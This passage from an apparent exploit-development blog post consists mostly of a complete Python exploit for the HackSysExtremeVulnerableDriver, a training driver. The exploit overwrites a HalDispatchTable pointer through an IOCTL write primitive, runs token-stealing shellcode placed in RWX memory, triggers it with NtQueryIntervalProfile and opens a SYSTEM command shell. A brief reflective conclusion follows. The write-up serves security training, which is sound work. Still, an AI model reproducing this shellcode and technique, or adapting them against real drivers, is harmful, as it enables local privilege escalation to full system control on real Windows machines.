    kernel_hal = userland_hal - kern_handle + int(kernel_base,16)
    printable_hal = hex(kernel_hal)
    if printable_hal[-1] == "L":
        printable_hal = printable_hal[:-1]
    print("[*] Kernel HalDispatchTable Address: {}".format(printable_hal))

    target_hal = kernel_hal + 0x8    
    print("[*] Target HalDispatchTable Function Pointer at: {}".format(hex(target_hal)[:-1]))

    return target_hal    

def send_buf(target_hal):

    hevd = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 
        0xC0000000, 
        0, 
        None, 
        0x3, 
        0, 
        None)
    
    if (not hevd) or (hevd == -1):
        print("[!] Failed to retrieve handle to device-driver with error-code: " + str(GetLastError()))
        sys.exit(1)
    else:
        print("[*] Successfully retrieved handle to device-driver: " + str(hevd))

    
    shellcode = bytearray(
        "\x90\x90\xff\x50\x51\x41\x53\x52\x48\x31\xC0\x65\x48\x8B\x80\x88\x01\x00\x00"
        "\x48\x8B\x40\x70\x48\x89\xC1\x49\x89\xCB\x49\x83\xE3\x07\xBA\x04"
        "\x00\x00\x00\x48\x8B\x80\x88\x01\x00\x00\x48\x2D\x88\x01\x00\x00"
        "\x48\x39\x90\x80\x01\x00\x00\x75\xEA\x48\x8B\x90\x08\x02\x00\x00"
        "\x48\x83\xE2\xF0\x4C\x09\xDA\x48\x89\x91\x08\x02\x00\x00\x5A\x41"
        "\x5B\x59\x58\xc3")

    print("[*] Allocating shellcode character array...")
    try:
        usermode_addr = (c_char * len(shellcode)).from_buffer(shellcode)
        ptr = addressof(usermode_addr)
    except Exception as e:
        print("[!] Failed to allocate shellcode char array with error: " + str(e))
    print("[*] Allocated shellcode character array at: {}".format(hex(ptr)[:-1]))

    print("[*] Marking shellcode RWX...")
    result = kernel32.VirtualProtect(
        usermode_addr,
        c_int(len(shellcode)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code: {}".format(str(GetLastError())))

    print("[*] Allocating our What buffer...")
    try:
        new_buf_contents = bytearray(struct.pack("<Q", ptr))
        new_buf = (c_char * len(new_buf_contents)).from_buffer(new_buf_contents)
        new_buf_ptr = addressof(new_buf)
    except Exception as e:
        print("[!] Failed to allocate What buffer with error: " + str(e))
    print("[*] Allocated What buffer at: {}".format(hex(new_buf_ptr)[:-1]))

    print("[*] Marking What buffer RWX...")
    result = kernel32.VirtualProtect(
        new_buf,
        c_int(len(new_buf_contents)),
        c_int(0x40),
        byref(c_ulong())
    )

    if result == 0:
        print("[!] VirtualProtect failed with error code {}".format(str(GetLastError())))

    buf = struct.pack("<Q", new_buf_ptr)
    buf += struct.pack("<Q", target_hal)
    buf_length = len(buf)
    
    result = kernel32.DeviceIoControl(
        hevd,
        0x22200b,
        buf,
        buf_length,
        None,
        0,
        byref(c_ulong()),
        None
    )

    if result != 0:
        print("[*] Buffer sent to driver successfully.")
    else:
        print("[!] Payload failed. Last error: " + str(GetLastError()))

def exploit():
    
    print("[*] Triggering with NtQueryIntervalProfile...")
    ntdll.NtQueryIntervalProfile(0x2408, byref(c_ulong()))

    print("[*] Opening system shell...")
    Popen("start cmd", shell=True)


        
img_name, kernel_base = base()
target_hal = hal_calc(img_name, kernel_base)
send_buf(target_hal)
exploit()

If we run our updated shellcode exploit script, we get our coveted nt authority\system shell!

Conclusion

We learned a really useful WinDBG feature on this one, the access breakpoint. I feel like this is going to come in really handy going forward. It was fun troubleshooting this issue, discovering that with my script there was an unavoidable overwrite, and then taking the overwrite and progressing anyway. This is the type of thing that really builds skills in my opinion. We were forced to go off-plan, improvise, and get into the debugger to figure out what was going on. Onto the next exploit! Thanks again to everyone who has published blogs on Windows exploit development; it’s truly been appreciated.